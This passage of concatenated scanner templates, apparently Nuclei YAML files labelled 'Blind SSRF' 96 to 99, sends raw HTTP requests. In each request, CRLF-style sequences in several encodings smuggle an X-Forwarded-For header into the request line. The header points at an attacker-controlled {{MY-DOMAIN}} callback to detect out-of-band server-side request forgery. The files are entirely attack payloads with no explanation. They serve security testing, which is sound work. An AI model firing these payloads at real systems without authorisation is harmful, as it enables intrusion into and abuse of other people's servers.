18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-96.yaml:
--------------------------------------------------------------------------------
1 | id: 0x096
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.1%0AX-Forwarded-For:%20{{Host}}.{{Port}}.BSSRF-096.{{MY-DOMAIN}}%0A%0A HTTP/1.1
12 | Host: {{Hostname}}
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
14 | Cache-Control: no-transform
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-97.yaml:
--------------------------------------------------------------------------------
1 | id: 0x097
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.1%3F%0DX-Forwarded-For:%20{{Host}}.{{Port}}.BSSRF-097.{{MY-DOMAIN}}%3F%0D%3F%0D HTTP/1.1
12 | Host: {{Hostname}}
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
14 | Cache-Control: no-transform
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-98.yaml:
--------------------------------------------------------------------------------
1 | id: 0x098
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.10x0D0x0ADX-Forwarded-For:%20{{Host}}.{{Port}}.BSSRF-098.{{MY-DOMAIN}}0x0D0x0A0x0D0x0A HTTP/1.1
12 | Host: {{Hostname}}
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
14 | Cache-Control: no-transform
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-99.yaml:
--------------------------------------------------------------------------------
1 | id: 0x099
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.1\u560d\u560aX-Forwarded-For:%20{{Host}}.{{Port}}.BSSRF-099.{{MY-DOMAIN}}\u560d\u560a\u560d\u560a HTTP/1.1
12 | Host: {{Hostname}}
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
14 | Cache-Control: no-transform
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------